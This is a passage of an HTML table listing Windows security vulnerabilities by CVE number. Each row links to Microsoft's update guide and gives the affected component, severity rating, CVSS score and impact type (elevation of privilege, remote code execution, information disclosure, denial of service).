  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50430"><span>CVE-2026-50430</span></a></td>
  <td width="256" class="xl74">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50334"><span>CVE-2026-50334</span></a></td>
  <td width="256" class="xl74">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44800"><span>CVE-2026-44800</span></a></td>
  <td width="256" class="xl74">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50363"><span>CVE-2026-50363</span></a></td>
  <td width="256" class="xl74">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50431"><span>CVE-2026-50431</span></a></td>
  <td width="256" class="xl74">Windows Quality of
  Service (QoS) Packet Scheduler Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50372"><span>CVE-2026-50372</span></a></td>
  <td width="256" class="xl74">Windows Redirected
  Drive Buffering System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50666"><span>CVE-2026-50666</span></a></td>
  <td width="256" class="xl74">Windows Remote Access
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56647"><span>CVE-2026-56647</span></a></td>
  <td width="256" class="xl74">Windows Remote Access
  Service Infrastructure Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50330"><span>CVE-2026-50330</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50376"><span>CVE-2026-50376</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50504"><span>CVE-2026-50504</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58533"><span>CVE-2026-58533</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58535"><span>CVE-2026-58535</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58546"><span>CVE-2026-58546</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58539"><span>CVE-2026-58539</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Client Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55003"><span>CVE-2026-55003</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57979"><span>CVE-2026-57979</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50445"><span>CVE-2026-50445</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50497"><span>CVE-2026-50497</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54126"><span>CVE-2026-54126</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57982"><span>CVE-2026-57982</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50369"><span>CVE-2026-50369</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Services Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58626"><span>CVE-2026-58626</span></a></td>
  <td width="256" class="xl74">Windows Remote Desktop
  Services Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55014"><span>CVE-2026-55014</span></a></td>
  <td width="256" class="xl74">Windows Remote Help
  Defense Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50318"><span>CVE-2026-50318</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50407"><span>CVE-2026-50407</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50357"><span>CVE-2026-50357</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50441"><span>CVE-2026-50441</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50668"><span>CVE-2026-50668</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54109"><span>CVE-2026-54109</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49792"><span>CVE-2026-49792</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49793"><span>CVE-2026-49793</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50362"><span>CVE-2026-50362</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50492"><span>CVE-2026-50492</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50501"><span>CVE-2026-50501</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58530"><span>CVE-2026-58530</span></a></td>
  <td width="256" class="xl74">Windows Resilient File
  System (ReFS) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49791"><span>CVE-2026-49791</span></a></td>
  <td width="256" class="xl74">Windows Routing and
  Remote Access Service (RRAS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50451"><span>CVE-2026-50451</span></a></td>
  <td width="256" class="xl74">Windows Routing and
  Remote Access Service (RRAS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57096"><span>CVE-2026-57096</span></a></td>
  <td width="256" class="xl74">Windows Routing and
  Remote Access Service (RRAS) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50323"><span>CVE-2026-50323</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50452"><span>CVE-2026-50452</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50348"><span>CVE-2026-50348</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50345"><span>CVE-2026-50345</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50322"><span>CVE-2026-50322</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50340"><span>CVE-2026-50340</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50410"><span>CVE-2026-50410</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50449"><span>CVE-2026-50449</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50460"><span>CVE-2026-50460</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50403"><span>CVE-2026-50403</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50385"><span>CVE-2026-50385</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50413"><span>CVE-2026-50413</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50457"><span>CVE-2026-50457</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50486"><span>CVE-2026-50486</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50503"><span>CVE-2026-50503</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54125"><span>CVE-2026-54125</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58527"><span>CVE-2026-58527</span></a></td>
  <td width="256" class="xl74">Windows Runtime
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50373"><span>CVE-2026-50373</span></a></td>
  <td width="256" class="xl74">Windows Search Service
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50679"><span>CVE-2026-50679</span></a></td>
  <td width="256" class="xl74">Windows Search Service
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44806"><span>CVE-2026-44806</span></a></td>
  <td width="256" class="xl74">Windows Secure Channel
  Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50681"><span>CVE-2026-50681</span></a></td>
  <td width="256" class="xl74">Windows Secure Channel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56186"><span>CVE-2026-56186</span></a></td>
  <td width="256" class="xl74">Windows Secure Channel
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50367"><span>CVE-2026-50367</span></a></td>
  <td width="256" class="xl74">Windows Sensor Data
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58619"><span>CVE-2026-58619</span></a></td>
  <td width="256" class="xl74">Windows Sensor Data
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50311"><span>CVE-2026-50311</span></a></td>
  <td width="256" class="xl74">Windows Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50328"><span>CVE-2026-50328</span></a></td>
  <td width="256" class="xl74">Windows Server Update
  Service (WSUS) Tampering Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58531"><span>CVE-2026-58531</span></a></td>
  <td width="256" class="xl74">Windows SMB Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54997"><span>CVE-2026-54997</span></a></td>
  <td width="256" class="xl74">Windows SMB
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49801"><span>CVE-2026-49801</span></a></td>
  <td width="256" class="xl74">Windows SMB
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50690"><span>CVE-2026-50690</span></a></td>
  <td width="256" class="xl74">Windows SMB
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56168"><span>CVE-2026-56168</span></a></td>
  <td width="256" class="xl74">Windows SMB Server
  Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50360"><span>CVE-2026-50360</span></a></td>
  <td width="256" class="xl74">Windows SMB Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57089"><span>CVE-2026-57089</span></a></td>
  <td width="256" class="xl74">Windows SMB Server
  Network Transport Driver (srvnet.sys) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50333"><span>CVE-2026-50333</span></a></td>
  <td width="256" class="xl74">Windows Spaceport.sys
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
